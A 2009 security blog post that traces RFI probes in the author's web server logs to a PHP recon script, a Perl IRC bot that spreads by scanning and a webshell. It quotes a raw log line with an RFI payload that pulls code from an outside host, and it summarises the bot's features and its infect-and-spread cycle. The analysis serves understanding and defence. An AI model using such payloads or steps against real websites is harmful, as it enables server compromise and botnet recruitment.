Archive for February, 2009

 

Bots Galore!!!! Owning the Internets

Feb 04, 2009 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]

RFI attacks are nothing new.  I discussed this back in 08 [http://www.securepla.net/?p=11].  Pretty much the idea is that a malicious user runs their own PHP code on a vulnerable website.  Why discuss this again…  Well I saw these attacks constantly in my logs and it got me interested:

xxx.xxx.xxx.xxx – – [29/Jan/2009:09:45:36 -0500] “GET /logs//appserv/main.php?appserv_root=http://www.crosszero.org/zero/iddd.txt???? HTTP/1.1” 404 290 “” “libwww-perl/5.79”

How an RFI works is that the include() function above instructs the server to retrieve iddd.txt from the remote server and run this code locally.  This is possible because PHP allows the user to load both remote and local content with the same functions.  On a vulnerable system, the code sample above does not perform any checks on the content of the $appserv_root variable and it blindly passes it to the function.  Because the original piece of code appended .php to the file it would try to fetch the following URL.

Luckily, I wasn’t vulnerable to this type of attack, but this got me interested in what exactly was going on here.  So what I did first was separately pull the iddd.txt file that was called during the original request.

Here is http://www.crosszero.org/zero/iddd.txt:


*Notice: I included only images as I don’t want other script kiddies using my site to pull the files down. 

Looking through the iddd.txt, it is a pretty simple PHP file that returns system information, username, os, free space, total space, used space of the vulnerable system.

This is pretty much lets the malicious hacker know that the RFI attack was successfully accomplished and returns a bit of information on the system that was attacked.

This got me interested in what happens after a successful RFI is found.  As i scanned http://www.crosszero.org/zero/ (which has now been taken down),  and I found a multitude of different files that “crosszero” used.  What initially interested me was a file called load2.txt.  In load2.txt, the following was included:


Scanning through load2.txt, we see that he tries to make the server download his boo.txt file, execute it through perl, and lastly clear his tracks.  He tries every which way to download the file, aka curl, wget, ….  Now, we are getting somewhere.  To dive farther into this we need to take a look at what is in the boo.txt perl file.

http://www.crosszero.org/zero/boo.txt file:


Ah, looks like this was well commented and we can use it for Educational Purposes!!! yay!  So, what can this perl script do:

##  Features:                                                                      ##
##    [+]Sql Injection Scanner (Fixed a bug which release v5 was affected)         ##
##    [+]Remote File Inclusion Scanner                                             ##
##    [+]Local File Inclusion Scanner                                              ##
##    [+]Remote Code Execution Scanner                                             ##
##    [+]Mass Scan, Google,AlltheWeb,Yahoo, Msn domains:                           ##
##      .at/.com.au/.com.br/.ca/.ch/.cn/.de/.dk/.es/.fr/.it/.co.jp/.com.mx/.co.uk  ##
##    [+]Integrated Shell, so you can execute commands on the server               ##
##    [+]Security Mode to protect “dangerous” functions                            ##
##    [+]Spread Mode, to activate or disable Spread Function                       ##
##    [+]Single Spread Mode, to spread on RFI vulnerable sites                     ##
##    [+]Bypass Engines ON: Google, Yahoo                                          ##
##    !: To “bypass” these engines, the Scanner just looks for websites on other   ##
##    engines that use the same bots than the main ones

A pretty comprehensive list of tasks that a hacker could use.  Parsing through the file, we can see that it forces the vulnerable server to connect to an irc chatroom with servername: irc.XXXXXXXXX.org [changed for research purposes], then goto chan: #-, and use a predefined nickname from a list later on in the script.  After it has successfully joined the irc channel, it is now part of this bot network.

So let’s recap:

1) Find websites with RFI
2) Force the vulnerable server to download the perl script through RFI
3) Run the script on the vulnerable machine, which causes that server to connect back to a irc chat room and wait for its next commands.
4) Send the bots commands and watch your bot network scan and attack the internet.

Let us take a look at what happens in the IRC bot room:


As we can see here, someone has triggered the bots to start scanning for bugs with /?prefix= using some type of dork (or search string) in many of the common search engines.  A successful attack will look like this:


If you look at the text in white, you see the information about the server that I had talked about before (the iddd.txt).  This tells us that the server is vulnerable to RFI and the cycle continues.  The compromised server, downloads the malicious code, runs it, joins the bot network and waits again.

Extra:

So really how bad is this? “Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Potentially, the attacker could even use the webshell to gain administrator-level, or root access on the server.” -Wikipedia

Here is a sample picture of a  PHP webshell called r57.txt that was included into a vulnerable RFI webpage:


Here we see that we have shell on the box with the privileges of the Apache service. 🙂

-Cheetz

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]